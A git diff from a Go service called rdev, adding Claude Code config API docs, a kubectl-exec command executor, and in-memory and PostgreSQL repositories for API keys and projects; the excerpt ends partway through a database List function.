id_ed25519: REPLACE_WITH_BASE64_ENCODED_PRIVATE_KEY
|
||||
|
||||
# GitHub's SSH host key (pre-populated)
|
||||
known_hosts: Z2l0aHViLmNvbSBzc2gtZWQyNTUxOSBBQUFBQzNOemFDMWxaREkxTlRFNUFBQUFJT01xcW5rVnpybTBTZEc2VU9vcUtMc2FiZ0g1Qzlva1dpMGRoMmw5R0tKbApnaXRodWIuY29tIGVjZHNhLXNoYTItbmlzdHAyNTYgQUFBQUUyVmpaSE5oTFhOb1lUSXRibWx6ZEhBeU5UWUFBQUFJYm1semRIQXlOVFlBQUFCQkJFbUtTRU5qUUVlek9teGtaTXk3b3BLZ3dGQjlua3Q1WVJyWU1qTnVHNU44N3VSUW81dDRRYkZGelVaYUpVQjd4TmtjYVFTNmlIbW5TazdNOU9tZUR2PT0KZ2l0aHViLmNvbSBzc2gtcnNhIEFBQUFCM056YUMxeWMyRUFBQUFEQVFBQkFBQUJnUUNqN25kTnhRb3dnY1FuanNoY0xycVBFaWlwaG50K1ZUVHZEUCtsSFhaZFhMRThWVUxDS0lLYjloZk5qM0FXSm1RTHBDb0Qzc1F2TWtGNUxXR1RMSFRVM25MSjViZi8wbG5wOGV5ZXhVNkpzR1dSUUFLTnlENjkzQjVVR2xXVlM1VjFqUEg1M3BZVllWUVB6WnlkeGpPUVFLeHk5ZkdoaVFGbGcza3RoZFdSRE5oNy9SRHp4SEZEZmRYYm5uSnZ4WVQ0Y1FVWWJ0SmFTQ0pWcU9aOVlUbG13bTJBUXZaM3IxZEJkZzVRcWN1SW53bzR1NXBhQUpObnpiTXBudGtzVXpWNEorUFN5OE9LSzRPc0tUc0I0RlNjS0VOSmRlMTlYTGFCUHJiNTZpUHhCS0tSMGJNK2NPdnhKelhhZWJORktjR2k4eVJLaGw0T0hlYkhCWDh4eFpZNWMwdWdpcTlSb29QaUtPelJERE1lekdhK0c4MDg1OVF2TkdPK3pZM3RNeHJIM1crT21uYU5keVN6dkpPUktjZEEwejNGU1huUk5jbnZpVlg0c3lGaWdhOUxGZjZ0ZDBhRy8xUFEwVjRCYzFQNXNHdTZBQUFBZUg0em5YNStNNTErUUpWZGorR2NMdTMwcE91U0E1cVZOQ0FodXl6RklBWWlhbjBFWUlnUlE3TmxYdz0K
|
||||
166
docs/claude-config-api.md
Normal file
166
docs/claude-config-api.md
Normal file
@ -0,0 +1,166 @@
|
||||
# Claude Config API
|
||||
|
||||
Manage Claude Code commands, skills, and agents via the rdev API.
|
||||
|
||||
## Architecture
|
||||
|
||||
```
|
||||
/root/.claude/ # Shared PVC (all projects)
|
||||
├── .credentials.json # Auth tokens (shared)
|
||||
└── settings.json # Global preferences
|
||||
|
||||
/workspace/.claude/ # In git repo (per-project)
|
||||
├── commands/ # Project slash commands
|
||||
│ └── deploy.md
|
||||
├── skills/ # Project skills
|
||||
│ └── go-testing.md
|
||||
└── agents/ # Project agents
|
||||
└── code-reviewer.md
|
||||
```
|
||||
|
||||
## Authentication
|
||||
|
||||
All endpoints require `Authorization: Bearer <api-key>` header.
|
||||
|
||||
- `projects:read` scope for GET endpoints
|
||||
- `projects:execute` scope for POST/PUT/DELETE endpoints
|
||||
|
||||
## Endpoints
|
||||
|
||||
### Overview
|
||||
|
||||
```
|
||||
GET /projects/{id}/claude-config
|
||||
```
|
||||
|
||||
Returns counts and lists of available commands, skills, and agents.
|
||||
|
||||
**Response:**
|
||||
```json
|
||||
{
|
||||
"data": {
|
||||
"project": "pantheon",
|
||||
"path": "/workspace/.claude",
|
||||
"commands": ["deploy", "test"],
|
||||
"skills": ["go-testing"],
|
||||
"agents": ["code-reviewer"]
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Commands
|
||||
|
||||
```
|
||||
GET /projects/{id}/claude-config/commands # List all
|
||||
POST /projects/{id}/claude-config/commands # Create
|
||||
GET /projects/{id}/claude-config/commands/{name} # Get one
|
||||
PUT /projects/{id}/claude-config/commands/{name} # Update
|
||||
DELETE /projects/{id}/claude-config/commands/{name} # Delete
|
||||
```
|
||||
|
||||
### Skills
|
||||
|
||||
```
|
||||
GET /projects/{id}/claude-config/skills # List all
|
||||
POST /projects/{id}/claude-config/skills # Create
|
||||
GET /projects/{id}/claude-config/skills/{name} # Get one
|
||||
PUT /projects/{id}/claude-config/skills/{name} # Update
|
||||
DELETE /projects/{id}/claude-config/skills/{name} # Delete
|
||||
```
|
||||
|
||||
### Agents
|
||||
|
||||
```
|
||||
GET /projects/{id}/claude-config/agents # List all
|
||||
POST /projects/{id}/claude-config/agents # Create
|
||||
GET /projects/{id}/claude-config/agents/{name} # Get one
|
||||
PUT /projects/{id}/claude-config/agents/{name} # Update
|
||||
DELETE /projects/{id}/claude-config/agents/{name} # Delete
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
### Create a command
|
||||
|
||||
```bash
|
||||
curl -X POST http://localhost:8080/projects/pantheon/claude-config/commands \
|
||||
-H "Authorization: Bearer $RDEV_API_KEY" \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{
|
||||
"name": "deploy",
|
||||
"content": "---\ndescription: Deploy to production\n---\n\n1. Run tests\n2. Build image\n3. Deploy to k8s"
|
||||
}'
|
||||
```
|
||||
|
||||
### List commands
|
||||
|
||||
```bash
|
||||
curl http://localhost:8080/projects/pantheon/claude-config/commands \
|
||||
-H "Authorization: Bearer $RDEV_API_KEY"
|
||||
```
|
||||
|
||||
### Get a specific command
|
||||
|
||||
```bash
|
||||
curl http://localhost:8080/projects/pantheon/claude-config/commands/deploy \
|
||||
-H "Authorization: Bearer $RDEV_API_KEY"
|
||||
```
|
||||
|
||||
### Update a command
|
||||
|
||||
```bash
|
||||
curl -X PUT http://localhost:8080/projects/pantheon/claude-config/commands/deploy \
|
||||
-H "Authorization: Bearer $RDEV_API_KEY" \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{
|
||||
"content": "---\ndescription: Deploy to production (updated)\n---\n\nNew steps..."
|
||||
}'
|
||||
```
|
||||
|
||||
### Delete a command
|
||||
|
||||
```bash
|
||||
curl -X DELETE http://localhost:8080/projects/pantheon/claude-config/commands/deploy \
|
||||
-H "Authorization: Bearer $RDEV_API_KEY"
|
||||
```
|
||||
|
||||
## File Format
|
||||
|
||||
Commands, skills, and agents are markdown files with optional YAML frontmatter:
|
||||
|
||||
```markdown
|
||||
---
|
||||
description: Short description shown in /help
|
||||
---
|
||||
|
||||
# Full instructions
|
||||
|
||||
Detailed instructions for Claude...
|
||||
```
|
||||
|
||||
## Git Integration
|
||||
|
||||
Since files are stored in `/workspace/.claude/`, you can commit them to git:
|
||||
|
||||
```bash
|
||||
# Via API
|
||||
POST /projects/pantheon/git
|
||||
{"args": ["add", ".claude/"]}
|
||||
|
||||
POST /projects/pantheon/git
|
||||
{"args": ["commit", "-m", "Add deploy command"]}
|
||||
|
||||
POST /projects/pantheon/git
|
||||
{"args": ["push"]}
|
||||
```
|
||||
|
||||
## Shared Credentials
|
||||
|
||||
Claude auth is stored on a shared PVC (`claudebox-shared-claude-config`).
|
||||
|
||||
Authenticate once, all project pods can use it:
|
||||
|
||||
```bash
|
||||
./scripts/claude-auth.sh pantheon # Auth in any pod
|
||||
# Now all pods share the credentials
|
||||
```
|
||||
212
internal/adapter/kubernetes/executor.go
Normal file
212
internal/adapter/kubernetes/executor.go
Normal file
@ -0,0 +1,212 @@
|
||||
// Package kubernetes provides Kubernetes-based implementations of port interfaces.
|
||||
package kubernetes
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"context"
|
||||
"fmt"
|
||||
"io"
|
||||
"os/exec"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/orchard9/rdev/internal/domain"
|
||||
"github.com/orchard9/rdev/internal/port"
|
||||
)
|
||||
|
||||
// Executor implements port.CommandExecutor using kubectl exec.
|
||||
type Executor struct {
|
||||
namespace string
|
||||
mu sync.RWMutex
|
||||
|
||||
// Track active commands for cancellation
|
||||
activeCommands map[domain.CommandID]context.CancelFunc
|
||||
activeMu sync.Mutex
|
||||
}
|
||||
|
||||
// NewExecutor creates a new Kubernetes command executor.
|
||||
func NewExecutor(namespace string) *Executor {
|
||||
return &Executor{
|
||||
namespace: namespace,
|
||||
activeCommands: make(map[domain.CommandID]context.CancelFunc),
|
||||
}
|
||||
}
|
||||
|
||||
// Ensure Executor implements port.CommandExecutor at compile time.
|
||||
var _ port.CommandExecutor = (*Executor)(nil)
|
||||
|
||||
// Execute runs a command in the target pod and streams output to the handler.
|
||||
func (e *Executor) Execute(ctx context.Context, cmd *domain.Command, podName string, handler domain.OutputHandler) (*domain.CommandResult, error) {
|
||||
e.mu.RLock()
|
||||
namespace := e.namespace
|
||||
e.mu.RUnlock()
|
||||
|
||||
// Create cancellable context for this command
|
||||
cmdCtx, cancel := context.WithCancel(ctx)
|
||||
defer cancel()
|
||||
|
||||
// Track for potential cancellation
|
||||
e.activeMu.Lock()
|
||||
e.activeCommands[cmd.ID] = cancel
|
||||
e.activeMu.Unlock()
|
||||
|
||||
defer func() {
|
||||
e.activeMu.Lock()
|
||||
delete(e.activeCommands, cmd.ID)
|
||||
e.activeMu.Unlock()
|
||||
}()
|
||||
|
||||
startTime := time.Now()
|
||||
var args []string
|
||||
|
||||
switch cmd.Type {
|
||||
case domain.CommandTypeClaude:
|
||||
// claude "prompt"
|
||||
args = []string{
|
||||
"exec", "-n", namespace, podName, "--",
|
||||
"claude", cmd.Args[0], // prompt is first arg
|
||||
}
|
||||
case domain.CommandTypeShell:
|
||||
// bash -c "command"
|
||||
args = []string{
|
||||
"exec", "-n", namespace, podName, "--",
|
||||
"bash", "-c", cmd.Args[0], // command is first arg
|
||||
}
|
||||
case domain.CommandTypeGit:
|
||||
// git <args...>
|
||||
args = append([]string{
|
||||
"exec", "-n", namespace, podName, "--",
|
||||
"git", "-C", "/workspace",
|
||||
}, cmd.Args...)
|
||||
default:
|
||||
return &domain.CommandResult{
|
||||
CommandID: cmd.ID,
|
||||
ExitCode: 1,
|
||||
Error: fmt.Errorf("unknown command type: %s", cmd.Type),
|
||||
}, nil
|
||||
}
|
||||
|
||||
// Create the kubectl command
|
||||
kubectl := exec.CommandContext(cmdCtx, "kubectl", args...)
|
||||
|
||||
// Get stdout and stderr pipes
|
||||
stdout, err := kubectl.StdoutPipe()
|
||||
if err != nil {
|
||||
return &domain.CommandResult{
|
||||
CommandID: cmd.ID,
|
||||
ExitCode: 1,
|
||||
Error: fmt.Errorf("stdout pipe: %w", err),
|
||||
}, nil
|
||||
}
|
||||
stderr, err := kubectl.StderrPipe()
|
||||
if err != nil {
|
||||
return &domain.CommandResult{
|
||||
CommandID: cmd.ID,
|
||||
ExitCode: 1,
|
||||
Error: fmt.Errorf("stderr pipe: %w", err),
|
||||
}, nil
|
||||
}
|
||||
|
||||
// Start the command
|
||||
if err := kubectl.Start(); err != nil {
|
||||
return &domain.CommandResult{
|
||||
CommandID: cmd.ID,
|
||||
ExitCode: 1,
|
||||
Error: fmt.Errorf("start: %w", err),
|
||||
}, nil
|
||||
}
|
||||
|
||||
// Stream output concurrently
|
||||
var wg sync.WaitGroup
|
||||
wg.Add(2)
|
||||
|
||||
go func() {
|
||||
defer wg.Done()
|
||||
streamOutput(stdout, "stdout", handler)
|
||||
}()
|
||||
|
||||
go func() {
|
||||
defer wg.Done()
|
||||
streamOutput(stderr, "stderr", handler)
|
||||
}()
|
||||
|
||||
// Wait for output to be consumed
|
||||
wg.Wait()
|
||||
|
||||
// Wait for command to complete
|
||||
err = kubectl.Wait()
|
||||
duration := time.Since(startTime)
|
||||
|
||||
result := &domain.CommandResult{
|
||||
CommandID: cmd.ID,
|
||||
DurationMs: duration.Milliseconds(),
|
||||
}
|
||||
|
||||
if err != nil {
|
||||
if exitError, ok := err.(*exec.ExitError); ok {
|
||||
result.ExitCode = exitError.ExitCode()
|
||||
} else {
|
||||
result.ExitCode = 1
|
||||
result.Error = err
|
||||
}
|
||||
}
|
||||
|
||||
return result, nil
|
||||
}
|
||||
|
||||
// streamOutput reads from a reader and sends each line to the handler.
|
||||
func streamOutput(r io.Reader, stream string, handler domain.OutputHandler) {
|
||||
scanner := bufio.NewScanner(r)
|
||||
// Increase buffer size for long lines
|
||||
buf := make([]byte, 0, 64*1024)
|
||||
scanner.Buffer(buf, 1024*1024)
|
||||
|
||||
for scanner.Scan() {
|
||||
handler(domain.OutputLine{
|
||||
Stream: stream,
|
||||
Line: scanner.Text(),
|
||||
Timestamp: time.Now(),
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// Cancel attempts to cancel a running command.
|
||||
func (e *Executor) Cancel(ctx context.Context, cmdID domain.CommandID) error {
|
||||
e.activeMu.Lock()
|
||||
defer e.activeMu.Unlock()
|
||||
|
||||
cancel, exists := e.activeCommands[cmdID]
|
||||
if !exists {
|
||||
return domain.ErrCommandNotFound
|
||||
}
|
||||
|
||||
cancel()
|
||||
return nil
|
||||
}
|
||||
|
||||
// PodExists checks if a pod exists and is running.
|
||||
func (e *Executor) PodExists(ctx context.Context, podName string) (bool, error) {
|
||||
e.mu.RLock()
|
||||
namespace := e.namespace
|
||||
e.mu.RUnlock()
|
||||
|
||||
cmd := exec.CommandContext(ctx, "kubectl",
|
||||
"get", "pod", podName,
|
||||
"-n", namespace,
|
||||
"-o", "jsonpath={.status.phase}",
|
||||
)
|
||||
|
||||
output, err := cmd.Output()
|
||||
if err != nil {
|
||||
// Pod doesn't exist or error
|
||||
return false, nil
|
||||
}
|
||||
|
||||
return string(output) == "Running", nil
|
||||
}
|
||||
|
||||
// CheckConnection verifies connectivity to the Kubernetes cluster.
|
||||
func (e *Executor) CheckConnection(ctx context.Context) error {
|
||||
cmd := exec.CommandContext(ctx, "kubectl", "cluster-info", "--request-timeout=5s")
|
||||
return cmd.Run()
|
||||
}
|
||||
150
internal/adapter/memory/apikey_repository.go
Normal file
150
internal/adapter/memory/apikey_repository.go
Normal file
@ -0,0 +1,150 @@
|
||||
package memory
|
||||
|
||||
import (
|
||||
"context"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/orchard9/rdev/internal/domain"
|
||||
"github.com/orchard9/rdev/internal/port"
|
||||
)
|
||||
|
||||
// APIKeyRepository is an in-memory implementation of port.APIKeyRepository.
|
||||
type APIKeyRepository struct {
|
||||
keys map[domain.APIKeyID]*domain.APIKey
|
||||
keysByHash map[string]domain.APIKeyID
|
||||
nextID int
|
||||
mu sync.RWMutex
|
||||
}
|
||||
|
||||
// NewAPIKeyRepository creates a new in-memory API key repository.
|
||||
func NewAPIKeyRepository() *APIKeyRepository {
|
||||
return &APIKeyRepository{
|
||||
keys: make(map[domain.APIKeyID]*domain.APIKey),
|
||||
keysByHash: make(map[string]domain.APIKeyID),
|
||||
}
|
||||
}
|
||||
|
||||
// Ensure APIKeyRepository implements port.APIKeyRepository at compile time.
|
||||
var _ port.APIKeyRepository = (*APIKeyRepository)(nil)
|
||||
|
||||
// Create stores a new API key.
|
||||
func (r *APIKeyRepository) Create(ctx context.Context, key *domain.APIKey, keyHash string) error {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
|
||||
r.nextID++
|
||||
key.ID = domain.APIKeyID(itoa(r.nextID))
|
||||
key.CreatedAt = time.Now()
|
||||
|
||||
// Store the key
|
||||
r.keys[key.ID] = key
|
||||
r.keysByHash[keyHash] = key.ID
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// GetByHash retrieves an API key by its hash.
|
||||
func (r *APIKeyRepository) GetByHash(ctx context.Context, keyHash string) (*domain.APIKey, error) {
|
||||
r.mu.RLock()
|
||||
defer r.mu.RUnlock()
|
||||
|
||||
id, ok := r.keysByHash[keyHash]
|
||||
if !ok {
|
||||
return nil, domain.ErrKeyNotFound
|
||||
}
|
||||
|
||||
key, ok := r.keys[id]
|
||||
if !ok {
|
||||
return nil, domain.ErrKeyNotFound
|
||||
}
|
||||
|
||||
return key, nil
|
||||
}
|
||||
|
||||
// Get retrieves an API key by ID.
|
||||
func (r *APIKeyRepository) Get(ctx context.Context, id domain.APIKeyID) (*domain.APIKey, error) {
|
||||
r.mu.RLock()
|
||||
defer r.mu.RUnlock()
|
||||
|
||||
key, ok := r.keys[id]
|
||||
if !ok {
|
||||
return nil, domain.ErrKeyNotFound
|
||||
}
|
||||
|
||||
return key, nil
|
||||
}
|
||||
|
||||
// List returns all API keys (without secrets).
|
||||
func (r *APIKeyRepository) List(ctx context.Context) ([]*domain.APIKey, error) {
|
||||
r.mu.RLock()
|
||||
defer r.mu.RUnlock()
|
||||
|
||||
keys := make([]*domain.APIKey, 0, len(r.keys))
|
||||
for _, key := range r.keys {
|
||||
keys = append(keys, key)
|
||||
}
|
||||
|
||||
return keys, nil
|
||||
}
|
||||
|
||||
// Revoke marks an API key as revoked.
|
||||
func (r *APIKeyRepository) Revoke(ctx context.Context, id domain.APIKeyID) error {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
|
||||
key, ok := r.keys[id]
|
||||
if !ok {
|
||||
return domain.ErrKeyNotFound
|
||||
}
|
||||
|
||||
if key.RevokedAt != nil {
|
||||
return domain.ErrKeyNotFound
|
||||
}
|
||||
|
||||
now := time.Now()
|
||||
key.RevokedAt = &now
|
||||
return nil
|
||||
}
|
||||
|
||||
// UpdateLastUsed updates the last used timestamp for a key.
|
||||
func (r *APIKeyRepository) UpdateLastUsed(ctx context.Context, id domain.APIKeyID) error {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
|
||||
key, ok := r.keys[id]
|
||||
if !ok {
|
||||
return domain.ErrKeyNotFound
|
||||
}
|
||||
|
||||
now := time.Now()
|
||||
key.LastUsedAt = &now
|
||||
return nil
|
||||
}
|
||||
|
||||
// itoa converts an integer to a string.
|
||||
func itoa(i int) string {
|
||||
if i == 0 {
|
||||
return "0"
|
||||
}
|
||||
|
||||
var buf [20]byte
|
||||
pos := len(buf)
|
||||
negative := i < 0
|
||||
if negative {
|
||||
i = -i
|
||||
}
|
||||
|
||||
for i > 0 {
|
||||
pos--
|
||||
buf[pos] = byte('0' + i%10)
|
||||
i /= 10
|
||||
}
|
||||
|
||||
if negative {
|
||||
pos--
|
||||
buf[pos] = '-'
|
||||
}
|
||||
|
||||
return string(buf[pos:])
|
||||
}
|
||||
93
internal/adapter/memory/project_repository.go
Normal file
93
internal/adapter/memory/project_repository.go
Normal file
@ -0,0 +1,93 @@
|
||||
// Package memory provides in-memory implementations of port interfaces for testing.
|
||||
package memory
|
||||
|
||||
import (
|
||||
"context"
|
||||
"sync"
|
||||
|
||||
"github.com/orchard9/rdev/internal/domain"
|
||||
"github.com/orchard9/rdev/internal/port"
|
||||
)
|
||||
|
||||
// ProjectRepository is an in-memory implementation of port.ProjectRepository.
|
||||
type ProjectRepository struct {
|
||||
projects map[domain.ProjectID]*domain.Project
|
||||
mu sync.RWMutex
|
||||
}
|
||||
|
||||
// NewProjectRepository creates a new in-memory project repository.
|
||||
func NewProjectRepository() *ProjectRepository {
|
||||
return &ProjectRepository{
|
||||
projects: make(map[domain.ProjectID]*domain.Project),
|
||||
}
|
||||
}
|
||||
|
||||
// Ensure ProjectRepository implements port.ProjectRepository at compile time.
|
||||
var _ port.ProjectRepository = (*ProjectRepository)(nil)
|
||||
|
||||
// List returns all available projects.
|
||||
func (r *ProjectRepository) List(ctx context.Context) ([]domain.Project, error) {
|
||||
r.mu.RLock()
|
||||
defer r.mu.RUnlock()
|
||||
|
||||
projects := make([]domain.Project, 0, len(r.projects))
|
||||
for _, p := range r.projects {
|
||||
projects = append(projects, *p)
|
||||
}
|
||||
return projects, nil
|
||||
}
|
||||
|
||||
// Get returns a project by ID.
|
||||
func (r *ProjectRepository) Get(ctx context.Context, id domain.ProjectID) (*domain.Project, error) {
|
||||
r.mu.RLock()
|
||||
defer r.mu.RUnlock()
|
||||
|
||||
p, ok := r.projects[id]
|
||||
if !ok {
|
||||
return nil, domain.ErrProjectNotFound
|
||||
}
|
||||
return p, nil
|
||||
}
|
||||
|
||||
// Exists checks if a project exists.
|
||||
func (r *ProjectRepository) Exists(ctx context.Context, id domain.ProjectID) (bool, error) {
|
||||
r.mu.RLock()
|
||||
defer r.mu.RUnlock()
|
||||
|
||||
_, ok := r.projects[id]
|
||||
return ok, nil
|
||||
}
|
||||
|
||||
// Register adds a new project to the repository.
|
||||
func (r *ProjectRepository) Register(ctx context.Context, project *domain.Project) error {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
|
||||
r.projects[project.ID] = project
|
||||
return nil
|
||||
}
|
||||
|
||||
// Unregister removes a project from the repository.
|
||||
func (r *ProjectRepository) Unregister(ctx context.Context, id domain.ProjectID) error {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
|
||||
delete(r.projects, id)
|
||||
return nil
|
||||
}
|
||||
|
||||
// RefreshStatus updates the status of all projects.
|
||||
// For the in-memory implementation, this is a no-op.
|
||||
func (r *ProjectRepository) RefreshStatus(ctx context.Context) error {
|
||||
return nil
|
||||
}
|
||||
|
||||
// SetStatus is a test helper to set a project's status.
|
||||
func (r *ProjectRepository) SetStatus(id domain.ProjectID, status domain.ProjectStatus) {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
|
||||
if p, ok := r.projects[id]; ok {
|
||||
p.Status = status
|
||||
}
|
||||
}
|
||||
86
internal/adapter/memory/stream_publisher.go
Normal file
86
internal/adapter/memory/stream_publisher.go
Normal file
@ -0,0 +1,86 @@
|
||||
package memory
|
||||
|
||||
import (
|
||||
"sync"
|
||||
|
||||
"github.com/orchard9/rdev/internal/port"
|
||||
)
|
||||
|
||||
// StreamPublisher is an in-memory implementation of port.StreamPublisher.
|
||||
type StreamPublisher struct {
|
||||
mu sync.RWMutex
|
||||
streams map[string][]chan port.StreamEvent
|
||||
}
|
||||
|
||||
// NewStreamPublisher creates a new in-memory stream publisher.
|
||||
func NewStreamPublisher() *StreamPublisher {
|
||||
return &StreamPublisher{
|
||||
streams: make(map[string][]chan port.StreamEvent),
|
||||
}
|
||||
}
|
||||
|
||||
// Ensure StreamPublisher implements port.StreamPublisher at compile time.
|
||||
var _ port.StreamPublisher = (*StreamPublisher)(nil)
|
||||
|
||||
// Subscribe creates a subscription to events for the given stream ID.
|
||||
func (sp *StreamPublisher) Subscribe(streamID string) (<-chan port.StreamEvent, func()) {
|
||||
sp.mu.Lock()
|
||||
defer sp.mu.Unlock()
|
||||
|
||||
ch := make(chan port.StreamEvent, 100)
|
||||
sp.streams[streamID] = append(sp.streams[streamID], ch)
|
||||
|
||||
// Return cleanup function
|
||||
cleanup := func() {
|
||||
sp.unsubscribe(streamID, ch)
|
||||
}
|
||||
|
||||
return ch, cleanup
|
||||
}
|
||||
|
||||
func (sp *StreamPublisher) unsubscribe(streamID string, ch chan port.StreamEvent) {
|
||||
sp.mu.Lock()
|
||||
defer sp.mu.Unlock()
|
||||
|
||||
channels := sp.streams[streamID]
|
||||
for i, c := range channels {
|
||||
if c == ch {
|
||||
sp.streams[streamID] = append(channels[:i], channels[i+1:]...)
|
||||
close(ch)
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Publish sends an event to all subscribers of a stream.
|
||||
func (sp *StreamPublisher) Publish(streamID string, event port.StreamEvent) {
|
||||
sp.mu.RLock()
|
||||
defer sp.mu.RUnlock()
|
||||
|
||||
for _, ch := range sp.streams[streamID] {
|
||||
select {
|
||||
case ch <- event:
|
||||
default:
|
||||
// Channel full, skip
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Close closes a stream and all its subscriptions.
|
||||
func (sp *StreamPublisher) Close(streamID string) {
|
||||
sp.mu.Lock()
|
||||
defer sp.mu.Unlock()
|
||||
|
||||
for _, ch := range sp.streams[streamID] {
|
||||
close(ch)
|
||||
}
|
||||
delete(sp.streams, streamID)
|
||||
}
|
||||
|
||||
// SubscriberCount returns the number of subscribers for a stream (for testing).
|
||||
func (sp *StreamPublisher) SubscriberCount(streamID string) int {
|
||||
sp.mu.RLock()
|
||||
defer sp.mu.RUnlock()
|
||||
|
||||
return len(sp.streams[streamID])
|
||||
}
|
||||
240
internal/adapter/postgres/apikey_repository.go
Normal file
240
internal/adapter/postgres/apikey_repository.go
Normal file
@ -0,0 +1,240 @@
|
||||
// Package postgres provides PostgreSQL-based implementations of port interfaces.
|
||||
package postgres
|
||||
|
||||
import (
|
||||
"context"
|
||||
"database/sql"
|
||||
"errors"
|
||||
"fmt"
|
||||
"time"
|
||||
|
||||
"github.com/lib/pq"
|
||||
"github.com/orchard9/rdev/internal/domain"
|
||||
"github.com/orchard9/rdev/internal/port"
|
||||
)
|
||||
|
||||
// APIKeyRepository implements port.APIKeyRepository using PostgreSQL.
|
||||
type APIKeyRepository struct {
|
||||
db *sql.DB
|
||||
}
|
||||
|
||||
// NewAPIKeyRepository creates a new PostgreSQL API key repository.
|
||||
func NewAPIKeyRepository(db *sql.DB) *APIKeyRepository {
|
||||
return &APIKeyRepository{db: db}
|
||||
}
|
||||
|
||||
// Ensure APIKeyRepository implements port.APIKeyRepository at compile time.
|
||||
var _ port.APIKeyRepository = (*APIKeyRepository)(nil)
|
||||
|
||||
// Create stores a new API key.
|
||||
func (r *APIKeyRepository) Create(ctx context.Context, key *domain.APIKey, keyHash string) error {
|
||||
scopeStrings := scopesToStrings(key.Scopes)
|
||||
projectIDStrings := projectIDsToStrings(key.ProjectIDs)
|
||||
|
||||
var id string
|
||||
err := r.db.QueryRowContext(ctx, `
|
||||
INSERT INTO api_keys (name, key_hash, key_prefix, scopes, project_ids, expires_at, created_by)
|
||||
VALUES ($1, $2, $3, $4, $5, $6, $7)
|
||||
RETURNING id
|
||||
`, key.Name, keyHash, key.KeyPrefix, pq.Array(scopeStrings), pq.Array(projectIDStrings), key.ExpiresAt, key.CreatedBy).Scan(&id)
|
||||
|
||||
if err != nil {
|
||||
return fmt.Errorf("insert key: %w", err)
|
||||
}
|
||||
|
||||
key.ID = domain.APIKeyID(id)
|
||||
key.CreatedAt = time.Now()
|
||||
return nil
|
||||
}
|
||||
|
||||
// GetByHash retrieves an API key by its hash.
|
||||
func (r *APIKeyRepository) GetByHash(ctx context.Context, keyHash string) (*domain.APIKey, error) {
|
||||
var (
|
||||
key domain.APIKey
|
||||
id string
|
||||
scopeStrings []string
|
||||
projectIDs []string
|
||||
)
|
||||
|
||||
err := r.db.QueryRowContext(ctx, `
|
||||
SELECT id, name, key_prefix, scopes, project_ids, created_at, expires_at, last_used_at, revoked_at, created_by
|
||||
FROM api_keys
|
||||
WHERE key_hash = $1
|
||||
`, keyHash).Scan(
|
||||
&id,
|
||||
&key.Name,
|
||||
&key.KeyPrefix,
|
||||
pq.Array(&scopeStrings),
|
||||
pq.Array(&projectIDs),
|
||||
&key.CreatedAt,
|
||||
&key.ExpiresAt,
|
||||
&key.LastUsedAt,
|
||||
&key.RevokedAt,
|
||||
&key.CreatedBy,
|
||||
)
|
||||
|
||||
if errors.Is(err, sql.ErrNoRows) {
|
||||
return nil, domain.ErrKeyNotFound
|
||||
}
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("query key: %w", err)
|
||||
}
|
||||
|
||||
key.ID = domain.APIKeyID(id)
|
||||
key.Scopes = scopesFromStrings(scopeStrings)
|
||||
key.ProjectIDs = projectIDsFromStrings(projectIDs)
|
||||
|
||||
return &key, nil
|
||||
}
|
||||
|
||||
// Get retrieves an API key by ID.
|
||||
func (r *APIKeyRepository) Get(ctx context.Context, id domain.APIKeyID) (*domain.APIKey, error) {
|
||||
var (
|
||||
key domain.APIKey
|
||||
keyID string
|
||||
scopeStrings []string
|
||||
projectIDs []string
|
||||
)
|
||||
|
||||
err := r.db.QueryRowContext(ctx, `
|
||||
SELECT id, name, key_prefix, scopes, project_ids, created_at, expires_at, last_used_at, revoked_at, created_by
|
||||
FROM api_keys
|
||||
WHERE id = $1
|
||||
`, string(id)).Scan(
|
||||
&keyID,
|
||||
&key.Name,
|
||||
&key.KeyPrefix,
|
||||
pq.Array(&scopeStrings),
|
||||
pq.Array(&projectIDs),
|
||||
&key.CreatedAt,
|
||||
&key.ExpiresAt,
|
||||
&key.LastUsedAt,
|
||||
&key.RevokedAt,
|
||||
&key.CreatedBy,
|
||||
)
|
||||
|
||||
if errors.Is(err, sql.ErrNoRows) {
|
||||
return nil, domain.ErrKeyNotFound
|
||||
}
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("query key: %w", err)
|
||||
}
|
||||
|
||||
key.ID = domain.APIKeyID(keyID)
|
||||
key.Scopes = scopesFromStrings(scopeStrings)
|
||||
key.ProjectIDs = projectIDsFromStrings(projectIDs)
|
||||
|
||||
return &key, nil
|
||||
}
|
||||
|
||||
// List returns all API keys (without secrets).
|
||||
func (r *APIKeyRepository) List(ctx context.Context) ([]*domain.APIKey, error) {
|
||||
rows, err := r.db.QueryContext(ctx, `
|
||||
SELECT id, name, key_prefix, scopes, project_ids, created_at, expires_at, last_used_at, revoked_at, created_by
|
||||
FROM api_keys
|
||||
ORDER BY created_at DESC
|
||||
`)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("query keys: %w", err)
|
||||
}
|
||||
defer rows.Close()
|
||||
|
||||
var keys []*domain.APIKey
|
||||
for rows.Next() {
|
||||
var (
|
||||
key domain.APIKey
|
||||
id string
|
||||
scopeStrings []string
|
||||
projectIDs []string
|
||||
)
|
||||
if err := rows.Scan(
|
||||
&id,
|
||||
&key.Name,
|
||||
&key.KeyPrefix,
|
||||
pq.Array(&scopeStrings),
|
||||
pq.Array(&projectIDs),
|
||||
&key.CreatedAt,
|
||||
&key.ExpiresAt,
|
||||
&key.LastUsedAt,
|
